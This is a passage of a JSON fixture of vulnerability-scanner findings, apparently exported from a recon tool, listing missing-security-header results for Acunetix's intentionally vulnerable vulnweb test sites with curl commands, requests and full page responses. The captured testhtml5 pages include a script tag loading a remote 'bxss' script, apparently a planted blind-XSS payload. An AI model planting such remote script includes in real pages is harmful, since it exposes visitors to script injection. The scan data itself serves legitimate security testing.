"x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:29.465Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 596, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:29.615Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 597, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:29.771Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 598, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:29.930Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" 